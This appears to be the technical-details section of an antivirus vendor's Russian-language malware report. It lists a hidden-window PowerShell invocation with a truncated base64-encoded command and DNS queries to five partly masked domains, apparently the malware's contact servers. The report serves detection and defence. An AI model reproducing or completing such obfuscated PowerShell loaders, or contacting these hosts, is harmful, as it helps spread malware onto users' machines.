Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABUAGgAdABlAHoAcABvAHYAcQBzAHMAbwA9ACcASQBxAG0AeQBvAG0AcQB3AGkAbQAnADsAJABVAGIAcQBmAGkAZABtAGIAbQBwAG...
- DNS ASK zt###droid.com
- DNS ASK xe####istics.com
- DNS ASK bo##otos.nl
- DNS ASK fl###rt.club
- DNS ASK ta####arietnik.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABUAGgAdABlAHoAcABvAHYAcQBzAHMAbwA9ACcASQBxAG0AeQBvAG0AcQB3AGkAbQAnADsAJABVAGIAcQBmAGkAZABtAGIAbQBwAG...' (со скрытым окном)